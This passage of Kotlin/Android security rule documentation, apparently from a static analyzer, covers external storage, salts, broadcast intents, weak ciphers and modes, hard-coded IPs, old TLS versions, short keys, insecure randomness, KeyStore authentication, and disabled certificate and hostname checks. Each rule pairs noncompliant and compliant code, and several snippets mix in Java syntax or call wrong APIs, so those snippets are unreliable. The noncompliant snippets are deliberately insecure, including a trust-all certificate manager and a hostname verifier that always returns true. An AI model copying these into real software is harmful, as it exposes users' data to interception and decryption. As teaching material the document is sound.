import android.content.Context
import android.content.IntentFilter
import android.os.Build
import android.os.Handler
import androidx.annotation.RequiresApi

class MyIntentReceiver {
    @RequiresApi(api = Build.VERSION_CODES.O)
    fun register(
        context: Context, receiver: BroadcastReceiver?,
        filter: IntentFilter?,
        broadcastPermission: String?,
        scheduler: Handler?,
        flags: Int
    ) {
        context.registerReceiver(receiver, filter, broadcastPermission, scheduler)
        context.registerReceiver(receiver, filter, broadcastPermission, scheduler, flags)
    }
}

See

kotlin:S5324

Storing data locally is a common task for mobile applications. Such data includes files among other things. One convenient way to store files is to use the external file storage which usually offers a larger amount of disc space compared to internal storage.

Files created on the external storage are globally readable and writable. Therefore, a malicious application having the permissions WRITE_EXTERNAL_STORAGE or READ_EXTERNAL_STORAGE could try to read sensitive information from the files that other applications have stored on the external storage.

External storage can also be removed by the user (e.g when based on SD card) making the files unavailable to the application.

Ask Yourself Whether

Your application uses external storage to:

  • store files that contain sensitive data.
  • store files that are not meant to be shared with other application.
  • store files that are critical for the application to work.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use internal storage whenever possible as the system prevents other apps from accessing this location.
  • Only use external storage if you need to share non-sensitive files with other applications.
  • If your application has to use the external storage to store sensitive data, make sure it encrypts the files using EncryptedFile.
  • Data coming from external storage should always be considered untrusted and should be validated.
  • As some external storage can be removed, make sure to never store files on it that are critical for the usability of your application.

Sensitive Code Example

import android.content.Context

class AccessExternalFiles {

    fun accessFiles(Context context) {
        context.getExternalFilesDir(null) // Sensitive
    }
}

Compliant Solution

import android.content.Context
import android.os.Environment

class AccessExternalFiles {

    fun accessFiles(Context context) {
        context.getFilesDir()
    }
}

See

kotlin:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.

How to fix it in Java SE

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

import javax.crypto.spec.PBEParameterSpec

fun hash() {
    val salt = "salty".toByteArray()
    val cipherSpec = PBEParameterSpec(salt, 10000) // Noncompliant
}

Compliant solution

import java.security.SecureRandom
import javax.crypto.spec.PBEParameterSpec

fun hash() {
    val random = SecureRandom()
    val salt = ByteArray(16)
    random.nextBytes(salt)
    val cipherSpec = PBEParameterSpec(salt, 10000)
}

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the nextBytes method from the SecureRandom class with a salt buffer of 16 bytes. This class implements a cryptographically secure pseudo-random number generator.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
kotlin:S5320

In Android applications, broadcasting intents is security-sensitive. For example, it has led in the past to the following vulnerability:

By default, broadcasted intents are visible to every application, exposing all sensitive information they contain.

This rule raises an issue when an intent is broadcasted without specifying any "receiver permission".

Ask Yourself Whether

  • The intent contains sensitive information.
  • Intent reception is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.os.Bundle
import android.os.Handler
import android.os.UserHandle

public class MyIntentBroadcast {
    fun broadcast(intent: Intent,
                  context: Context,
                  user: UserHandle,
                  resultReceiver: BroadcastReceiver,
                  scheduler: Handler,
                  initialCode: Int,
                  initialData: String,
                  initialExtras: Bundle,
                  broadcastPermission: String) {
        context.sendBroadcast(intent) // Sensitive
        context.sendBroadcastAsUser(intent, user) // Sensitive

        // Broadcasting intent with "null" for receiverPermission
        context.sendBroadcast(intent, null) // Sensitive
        context.sendBroadcastAsUser(intent, user, null) // Sensitive
        context.sendOrderedBroadcast(intent, null) // Sensitive
        context.sendOrderedBroadcastAsUser(intent, user, null, resultReceiver,
            scheduler, initialCode, initialData, initialExtras) // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.os.Bundle
import android.os.Handler
import android.os.UserHandle

public class MyIntentBroadcast {
    fun broadcast(intent: Intent,
                  context: Context,
                  user: UserHandle,
                  resultReceiver: BroadcastReceiver,
                  scheduler: Handler,
                  initialCode: Int,
                  initialData: String,
                  initialExtras: Bundle,
                  broadcastPermission: String) {

        context.sendBroadcast(intent, broadcastPermission)
        context.sendBroadcastAsUser(intent, user, broadcastPermission)
        context.sendOrderedBroadcast(intent, broadcastPermission)
        context.sendOrderedBroadcastAsUser(intent, user,broadcastPermission, resultReceiver,
            scheduler, initialCode, initialData, initialExtras)
    }
}

See

kotlin:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher

fun main(args: Array<String>) {
    try {
        val des = Cipher.getInstance("DES") // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

Compliant solution

import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher

fun main(args: Array<String>) {
    try {
        val aes = Cipher.getInstance("AES/GCM/NoPadding")
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

kotlin:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val aes = Cipher.getInstance("AES/CBC/PKCS5Padding"); // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

Example with an asymmetric cipher, RSA:

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val rsa = Cipher.getInstance("RSA/None/NoPadding"); // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val aes = Cipher.getInstance("AES/GCM/NoPadding");
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val rsa = Cipher.getInstance("RSA/ECB/OAEPWITHSHA-256ANDMGF1PADDING");
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

kotlin:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

val ip = "192.168.12.42"
val socket = ServerSocket(ip, 6667)

Compliant Solution

val ip = System.getenv("myapplication.ip")
val socket = ServerSocket(ip, 6667)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849
  • Addresses from ::ffff:0:127.0.0.1 to ::ffff:0:127.255.255.255 and from ::ffff:127.0.0.1 to ::ffff:127.255.255.255, which are local IPv4-mapped IPv6 addresses

See

kotlin:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import javax.net.ssl.SSLContext;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        SSLContext.getInstance("TLSv1.1"); // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

Compliant solution

import javax.net.ssl.SSLContext;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        SSLContext.getInstance("TLSv1.2");
    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

kotlin:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        val keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(1024); // Noncompliant

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

Here is an example of a private key generation with AES:

import java.security.KeyGenerator;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        val keyGenerator = KeyGenerator.getInstance("AES");
        keyGenerator.initialize(64); // Noncompliant

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

fun main(args: Array<String>) {
    try {
        val keyPairGenerator  = KeyPairGenerator.getInstance("EC");
        val ellipticCurveName = new ECGenParameterSpec("secp112r1"); // Noncompliant
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

Compliant solution

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        val keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(2048);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        val keyPairGenerator = KeyPairGenerator.getInstance("AES");
        keyPairGenerator.initialize(128);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

public static void main(String[] args) {
    try {
        val keyPairGenerator  = KeyPairGenerator.getInstance("EC");
        val ellipticCurveName = new ECGenParameterSpec("secp256r1");
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

kotlin:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Only use random number generators which are recommended by OWASP or any other trusted organization.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

val random = Random() // Noncompliant: Random() is not a secure random number generaotr
val bytes = ByteArray(20)
random.nextBytes(bytes)

Compliant Solution

val random = SecureRandom() // Compliant
val bytes = ByteArray(20)
random.nextBytes(bytes)

See

kotlin:S6288

Android KeyStore is a secure container for storing key materials, in particular it prevents key materials extraction, i.e. when the application process is compromised, the attacker cannot extract keys but may still be able to use them. It’s possible to enable an Android security feature, user authentication, to restrict usage of keys to only authenticated users. The lock screen has to be unlocked with defined credentials (pattern/PIN/password, biometric).

Ask Yourself Whether

  • The application requires prohibiting the use of keys in case of compromise of the application process.
  • The key material is used in the context of a highly sensitive application like a e-banking mobile app.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable user authentication (by setting setUserAuthenticationRequired to true during key generation) to use keys for a limited duration of time (by setting appropriate values to setUserAuthenticationValidityDurationSeconds), after which the user must re-authenticate.

Sensitive Code Example

Any users can use the key:

val keyGenerator: KeyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore")

var builder: KeyGenParameterSpec = KeyGenParameterSpec.Builder("test_secret_key", KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT) // Noncompliant
   .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
   .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
   .build()

keyGenerator.init(builder)

Compliant Solution

The use of the key is limited to authenticated users (for a duration of time defined to 60 seconds):

val keyGenerator: KeyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore")

var builder: KeyGenParameterSpec = KeyGenParameterSpec.Builder("test_secret_key", KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT)
   .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
   .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
   .setUserAuthenticationRequired(true) // Compliant
   .setUserAuthenticationParameters (60, KeyProperties.AUTH_DEVICE_CREDENTIAL)
   .build()

keyGenerator.init(builder)

See

kotlin:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by overriding X509TrustManager with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

val trustAllCerts = arrayOf<TrustManager>(object : X509TrustManager {
  @Throws(CertificateException::class)
  override fun checkClientTrusted(chain: Array<java.security.cert.X509Certificate>, authType: String) {
  } // Noncompliant

  @Throws(CertificateException::class)
  override fun checkServerTrusted(chain: Array<java.security.cert.X509Certificate>, authType: String) {
  } // Noncompliant

  override fun getAcceptedIssuers(): Array<java.security.cert.X509Certificate> {
   return arrayOf()
  }
})

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts

Resources

Standards

kotlin:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in OkHttp

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by overriding javax.net.ssl.HostnameVerifier.verify() with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

import javax.net.ssl.HttpsURLConnection
import javax.net.ssl.SSLSession
import javax.net.ssl.HostnameVerifier
import okhttp3.OkHttpClient
import okhttp3.Request
import okhttp3.Response

fun request() {
    val builder = OkHttpClient.Builder()
    builder.hostnameVerifier(object : HostnameVerifier {
      override fun verify(hostname: String?, session: SSLSession?): Boolean { // Noncompliant
        return true
      }
    })

    OkHttpClient client = builder.build()

    Request request = new Request.Builder()
            .url("https://example.com")
            .build()

    Response response = client.newCall(request).execute()
}

Compliant solution

import javax.net.ssl.HttpsURLConnection
import javax.net.ssl.SSLSession
import javax.net.ssl.HostnameVerifier
import okhttp3.OkHttpClient
import okhttp3.Request
import okhttp3.Response

fun request() {
    val builder = OkHttpClient.Builder()

    OkHttpClient client = builder.build()

    Request request = new Request.Builder()
            .url("https://example.com")
            .build()

